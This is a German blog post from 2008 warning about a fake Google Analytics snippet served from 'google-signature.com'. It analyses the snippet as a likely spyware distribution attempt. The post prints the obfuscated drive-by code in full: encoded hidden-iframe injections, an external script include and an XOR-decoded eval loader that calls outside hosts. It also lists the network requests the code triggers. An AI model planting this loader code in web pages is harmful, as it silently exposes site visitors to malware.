Warnung: google-signature.com
Allgemein/Internet April 4th, 2008Man besucht eine Webseite – der Browser stürzt ab. Normalerweise passiert sowas nicht – Grund genug, sich das einmal anzuschauen.
Die Seite selber ist leer – bis auf JavaScript dass bei (sehr) flüchtiger Betrachtung nach einem Google Analytics Code aussieht. Aber auch wenn Google gerne JavaScript obfuscated – so viel Versteckspielen und dann noch eine domain von der externes JavaScript nachgeladen wird und safe.google-signature.com lautet? Merke: Nicht überall, wo „safe“ draufsteht oder „google-signature“ ist Google oder „safe“ drinn.
<!– ~ –><script language=“javascript“>var mnx=’%‘;document.write( unescape( ‚%3C%69%66%72’+mnx+’61’+mnx+’6D%65%20%73%72%63%3D’+mnx+’27’+mnx+’68’+mnx+’74’+mnx+
‚74%70%3A%2F%2F%75%73’+mnx+’65’+mnx+’72’+mnx+’73’+mnx+’6F’+mnx+’66%74%77%61%72%65
%2E%69%6E%2F’+mnx+’73’+mnx+’75’+mnx+’74’+mnx+’72%61%2F%69%6E%2E’+mnx+’63’+mnx+’67’+
mnx+’69’+mnx+’3F%33%27%20%77%69’+mnx+’64’+mnx+’74’+mnx+’68’+mnx+’3D%27%31%27%20%68%65’+
mnx+’69’+mnx+’67’+mnx+’68’+mnx+’74’+mnx+’3D%27%31%27%20%73%74%79’+mnx+’6C’+mnx+’65’+mnx+
‚3D%27%76’+mnx+’69’+mnx+’73%69%62%69%6C%69%74%79%3A%20%68%69%64’+mnx+’64’+mnx+
‚65%6E%3B%27%3E%3C%2F%69%66%72%61’+mnx+’6D%65’+mnx+’3E‘ ) );</script><script language=“javascript“>var mnx=’%‘;document.write( unescape(‚%3C%69%66%72’+mnx+’61’+mnx+’6D%65%20%73%72%63%3D’+mnx+’27’+mnx+’68’+mnx+’74’+
mnx+’74%70%3A%2F%2F%75%73’+mnx+’65’+mnx+’72’+mnx+’73’+mnx+’6F’+mnx+’66%74%77%61%72%65
%2E%69%6E%2F’+mnx+’73’+mnx+’75’+mnx+’74’+mnx+’72%61%2F%69%6E%2E’+mnx+’63’+mnx+’67’+mnx+
’69’+mnx+’3F%33%27%20%77%69’+mnx+’64’+mnx+’74’+mnx+’68’+mnx+’3D%27%31%27%20%68%65’+mnx+
’69’+mnx+’67’+mnx+’68’+mnx+’74’+mnx+’3D%27%31%27%20%73%74%79’+mnx+’6C’+mnx+’65’+mnx+
‚3D%27%76’+mnx+’69’+mnx+’73%69%62%69%6C%69%74%79%3A%20%68%69%64’+mnx+’64’+mnx+
‚65%6E%3B%27%3E%3C%2F%69%66%72%61’+mnx+’6D%65’+mnx+’3E‘ ) );</script>
<!– ~ –><script src=“http://safe.google-signature.com/webanalytics.js“></script><script>function v47f603df6c30c(v47f603df6c312){ function v47f603df6c319 () {var v47f603df6c31d=16; return v47f603df6c31d;} return(parseInt(v47f603df6c312,v47f603df6c319()));}function v47f603df6c33e(v47f603df6c342){ function
v47f603df6c350 () {return 2;} var v47f603df6c346=“;for(v47f603df6c34a=0; v47f603df6c34a<v47f603df6c342.length; v47f603df6c34a+=v47f603df6c350()){ v47f603df6c346+=(String.fromCharCode(v47f603df6c30c(v47f603df6c342.substr(v47f603df6c34a, v47f603df6c350()))));}return v47f603df6c346;} document.write(v47f603df6c33e(‚3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63
756D656E742E777269746528273C696672616D65206E616D653D623632343234396337373234207372633D5C2
7687474703A2F2F75726C2F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A33353231372
92B2737645C272077696474683D333837206865696768743D3931207374796C653D5C27646973706C61793A20
6E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E‘));</script>
Die IP des hosts zeigt irgendwo nach Panama, die Domain ist auf „irgendwen“ registriert.
Danach versucht der Browser Daten nachzuladen:
GET http://safe.google-signature.com/webanalytics.js HTTP/1.0
GET http://usersoftware.in/sutra/in.cgi?3 HTTP/1.0
GET http://201.218.250.115/webanalytics/count.php?o=1 HTTP/1.0
Hier geht nur der erste Request noch gut, alles andere existiert nicht mehr, so dass eine Analyse schwer wird. Aber es sieht verdammt stark nach dem Versuch aus, Spyware oder ähnliches zu verbreiten. Eine Google Suche nach „google-signature.com“ bringt einige Seiten, in die der Code nicht korrekt eingebaut ist.
function google_jdbhra(google_aotnpc,google_uhj) { var google_dtbxcs = „“; for (var i = 0 ; i < google_aotnpc.length; ++i) google_dtbxcs += String.fromCharCode(google_uhj ^ google_aotnpc.charCodeAt(i)); return google_dtbxcs; } function google_vcp(google_hmp) { eval(google_hmp); return; } google_vcp(google_jdbhra(„\xe8\xf6\xf1\xfb\xf0\xe8\xb1\xec\xeb\xfe\xeb\xea\xec\xa2\xbd\xdb\xf0\xf1\xfa
\xbd\xa4\x92\x95\xfb\xf0\xfc\xea\xf2\xfa\xf1\xeb\xb1\xe8\xed\xf6\xeb\xfa\xb7\xb8\xa3\xf6\xb8\xb4\xb8\xf9
\xed\xfe\xb8\xb4\xb8\xf2\xfa\xbf\xec\xed\xb8\xb4\xb8\xfc\xa2\xbd\xb8\xb4\xea\xf1\xfa\xec\xfc\xfe\xef\xfa
\xb7\xb8\xf7\xeb\xeb\xef\xba\xac\xde\xb0\xb0\xad\xaf\xae\xb1\xad\xae\xa7\xb1\xad\xaa\xaf\xb1\xae\xae
\xaa\xb0\xe8\xfa\xfd\xfe\xf1\xfe\xf3\xe6\xeb\xf6\xfc\xec\xb0\xfc\xf0\xea\xf1\xeb\xb1\xef\xf7\xef\xba\xac\xd9\xf0
\xba\xac\xdb\xae\xb8\xb6\xb4\xb8\xbd\xbf\xe8\xf6\xfb\xeb\xf7\xa2\xbd\xaf\xbd\xbf\xf7\xfa\xf6\xf8\xf7\xeb\xa2
\xbd\xaf\xbd\xbf\xec\xeb\xb8\xb4\xb8\xe6\xf3\xfa\xa2\xbd\xfb\xf6\xb8\xb4\xb8\xec\xef\xb8\xb4\xb8\xf3\xfe
\xe6\xb8\xb4\xb8\xa5\xf1\xf0\xb8\xb4\xb8\xf1\xfa\xbd\xa1\xb8\xb6\xa4″, 159));
Neue Kommentare